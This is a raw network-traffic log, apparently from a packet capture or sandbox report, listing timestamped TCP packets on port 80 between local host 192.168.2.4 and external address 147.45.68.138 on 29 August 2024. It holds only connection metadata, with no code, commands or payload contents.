                                                      Aug 29, 2024 22:52:26.617086887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617096901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617130041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617208004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617218971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617228985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617238998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617250919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617253065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617263079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617270947 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617289066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617289066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617306948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617314100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617316961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617325068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617330074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617341995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617346048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617371082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617816925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617886066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617908001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617948055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617949963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617969036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617985010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.617988110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.617997885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.618004084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.618022919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.618041992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.700990915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701003075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701013088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701126099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701138020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701147079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701157093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701159954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701169014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701173067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701180935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701195002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701212883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701224089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701235056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701261044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701270103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701271057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701283932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701294899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701298952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701320887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701333046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701344013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701345921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701359987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701371908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701371908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701381922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701385975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701400042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701406002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701416969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701427937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701453924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701464891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701473951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701483965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701499939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701513052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701565027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701575994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701585054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701596022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701606989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701610088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701623917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701652050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701745033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701755047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701764107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701786041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701803923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701807022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701822996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701844931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701848030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701855898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701863050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701868057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701879025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701883078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701891899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701893091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701906919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701913118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701927900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701934099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701941967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701951981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701953888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701963902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.701972008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.701992035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702016115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702092886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702136040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702153921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702187061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702195883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702203989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702223063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702229977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702234030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702244997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702256918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702275991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702321053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702333927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702344894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702354908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702364922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702373028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702378988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702387094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702390909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702402115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702413082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702413082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702425957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702435970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702436924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702456951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702471018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702478886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702482939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702495098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702505112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702514887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702514887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702522993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702542067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702543020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702555895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702555895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702565908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702577114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702584028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702586889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702590942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702611923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702615023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702625990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702635050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702636003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702650070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702658892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.702661037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702688932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.702696085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703644037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703660965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703680038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703691959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703701019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703706026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703713894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703720093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703727007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703732014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703742027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703763962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703788042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703799009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703809023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703833103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703834057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703845024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703854084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703855991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703876972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703880072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703887939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703896046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703908920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703915119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703922987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703933001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703936100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703944921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703953981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703955889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703968048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.703969955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703994989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.703999043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704013109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704015017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704024076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704035044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704039097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704046011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704046965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704066038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704087019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704097986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704108953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704129934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704139948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704140902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704155922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704159975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704168081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704184055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704194069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704202890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704205990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704222918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704231977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704233885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704246998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704251051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704269886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704291105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704297066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704308033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704323053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704338074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704339027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704349041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704359055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704365969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704377890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.704382896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704401016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.704421043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787509918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787525892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787559032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787568092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787571907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787583113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787599087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787600994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787614107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787616968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787625074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787636995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787652016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787653923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787658930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787664890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787676096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787686110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787689924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787698030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787703991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787718058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787722111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787736893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787740946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787750006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787756920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787761927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787772894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787786961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787802935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787817001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787841082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787853003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787859917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787875891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787883043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787892103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787899971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787911892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787914038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787929058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787940025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787940025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787955046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787967920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787977934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.787978888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.787991047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788007021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788007975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788026094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788027048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788037062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788048983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788048983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788058043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788064003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788075924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788104057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788517952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788527012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788532972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788572073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788589001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788598061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788599014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788610935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788638115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788646936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788652897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788655996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788664103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788674116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788682938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788701057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788718939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788815975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788831949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788841963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788852930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788855076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788865089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.788870096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788885117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788902044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.788995981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789032936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789035082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789043903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789067030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789079905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.789088011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.789092064 CEST8049739147.45.68.138192.168.2.4
